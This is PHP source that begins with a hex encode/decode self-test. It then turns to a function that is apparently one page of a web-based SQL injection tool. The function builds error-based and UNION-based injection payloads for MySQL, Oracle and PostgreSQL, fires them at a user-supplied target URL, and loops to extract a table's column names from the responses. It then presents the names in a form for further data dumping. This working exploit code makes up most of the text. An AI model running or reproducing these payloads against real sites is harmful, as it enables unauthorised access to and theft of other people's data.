function testHex()
{
$hasErrors = false;
$allBytes = '';
for ($i = 0; $i < 256; $i++) {
$allBytes .= chr($i);
}
$allBytesHex = hexEncode($allBytes);
printf("hexEncode(allBytes) = %s\n", $allBytesHex);
$allBytesHexUpper = hexEncodeUpper($allBytes);
printf("hexEncodeUpper(allBytes) = %s\n\n", $allBytesHexUpper);
$allBytes = hexDecode($allBytesHex);
printf("hexDecode(allBytesHexLower) ret = %u: ", $allBytes === false ? 1 : 0);
$good = true;
for ($i = 0; $i < 256; $i++) {
if ($i != ord($allBytes[$i])) {
$good = false;
}
}
if ($allBytes === false || !$good) {
$hasErrors = true;
}
printf("%s\n", $good ? "good" : "bad");
$allBytes = hexDecode($allBytesHexUpper);
printf("hexDecode(allBytesHexUpper) ret = %u: ", $allBytes === false ? 1 : 0);
$good = true;
for ($i = 0; $i < 256; $i++) {
if ($i != ord($allBytes[$i])) {
$good = false;
}
}
if ($allBytes === false || !$good) {
$hasErrors = true;
}
printf("%s\n", $good ? "good" : "bad");
$allBytes = hexDecodeLower($allBytesHex);
printf("hexDecodeLower(allBytesHexLower) ret = %u: ", $allBytes === false ? 1 : 0);
$good = true;
for ($i = 0; $i < 256; $i++) {
if ($i != ord($allBytes[$i])) {
$good = false;
}
}
if ($allBytes === false || !$good) {
$hasErrors = true;
}
printf("%s\n", $good ? "good" : "bad");
$allBytes = hexDecodeUpper($allBytesHexUpper);
printf("hexDecodeUpper(allBytesHexUpper) ret = %u: ", $allBytes === false ? 1 : 0);
$good = true;
for ($i = 0; $i < 256; $i++) {
if ($i != ord($allBytes[$i])) {
$good = false;
}
}
if ($allBytes === false || !$good) {
$hasErrors = true;
}
printf("%s\n", $good ? "good" : "bad");
printf("\nShould error:\n");
$allBytes = hexDecodeLower($allBytesHexUpper);
printf("hexDecodeLower(allBytesHexUpper) ret = %u\n", $allBytes === false ? 1 : 0, $allBytes === false ? "good" : "bad");
if ($allBytes !== false) {
$hasErrors = true;
}
$allBytes = hexDecodeUpper($allBytesHex);
printf("hexDecodeUpper(allBytesHexLower) ret = %u\n", $allBytes === false ? 1 : 0, $allBytes === false ? "good" : "bad");
if ($allBytes !== false) {
$hasErrors = true;
}
if ($hasErrors) {
printf("*** FAILED ***\n");
} else {
printf("*** PASSED ***\n");
}
return $hasErrors;
}
function frame4()
{
html_header();
global $a, $payload_error, $b, $payload_union, $databas, $c, $payload_oracle, $d, $payload_postgre;
if (isset($_POST['columnas'])) {
$url = $_POST["url"];
$table_n = $_POST['nombre'];
$database = $_POST['database'];
$vuln_index = $_POST["lol"];
$sobras = $_POST['sobras'];
$tabla = asciiEncode($table_n);
if ($_POST['columnas'] == 'columns e-b') {
$mode = "mysql_error";
$query = $a[$vuln_index - 1];
$querys = str_replace("{$payload_error}", "(SELECT+1906+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D{$table_n}+AND+table_schema%3D" . $database . "),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)", $query);
} elseif ($_POST['columnas'] == 'columns u-q') {
$mode = "mysql_union";
$query = $b[$vuln_index - 1];
$querys = str_replace("{$payload_union}", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);
$querys = str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D" . $table_n . "%20AND%20table_schema%3D" . $database . "%23", $querys);
} elseif ($_POST['columnas'] == 'columns o-eb') {
$mode = "oracle_error";
$query = $c[$vuln_index - 1];
$table_n = asciiEncode($table_n);
$table_n3 = CHRize($table_n);
$querys = str_replace("{$payload_oracle}", "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D" . $table_n3 . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query);
} elseif ($_POST['columnas'] == 'columns pg') {
$mode = "postgre_error";
$query = $d[$vuln_index - 1];
$table_n = asciiEncode($table_n);
$table_n3 = CHRize($table_n);
$querys = str_replace("{$payload_postgre}", "(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(" . $table_n3 . ")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))", $query);
}
echo "\n\t\t\t\t<form action=\"" . $_SERVER['PHP_SELF'] . "?frame=15\" target=\"_blank\" method=\"post\" name=\"datos\" id=\"datos\">\n\t\t\t\t<input type=\"hidden\" name=\"url\" id=\"url\" value=\"{$url}\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"{$sobras}\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"database\" id=\"database\" value=\"{$database}\"/>\n\t\t\t\t<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"{$tabla}\"/>\n\t\t\t\t";
if ($mode == "mysql_error") {
$query_n = str_replace("{$payload_error}", '(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);
$i = 0;
$count = GetBetween(get_url($url . $querys . $sobras)) - 1;
$datos = "data e-b";
} elseif ($mode == "mysql_union") {
$query_n = str_replace("{$payload_union}", '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1)', $query);
$i = 0;
$count = GetBetween(get_url($url . $querys . $sobras)) - 1;
$datos = "data u-q";
} elseif ($mode == "oracle_error") {
$query_n = str_replace("{$payload_oracle}", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D' . $table_n3 . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);
$i = 1;
$count = GetBetween(get_url($url . $querys . $sobras));
$datos = "data o-eb";
} elseif ($mode == "postgre_error") {
$query_n = str_replace("{$payload_postgre}", '(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D(' . $table_n3 . ')%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)', $query);
$i = 0;
$count = GetBetween(get_url($url . $querys . $sobras)) - 1;
$datos = "data pg";
}
while ($i <= $count) {
$query_nombre = str_replace('$i', "{$i}", $query_n);
$nombre = GetBetween(get_url($url . $query_nombre . $sobras));
echo "<input type=\"checkbox\" name=\"nombre[]\" id=\"nombre\" value=\"" . hexEncode($nombre) . "\">{$nombre}</input><br>";
$i++;
}
echo "<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"{$vuln_index}\"/>";
echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"{$datos}\"/>";
echo "</form>";
}
}
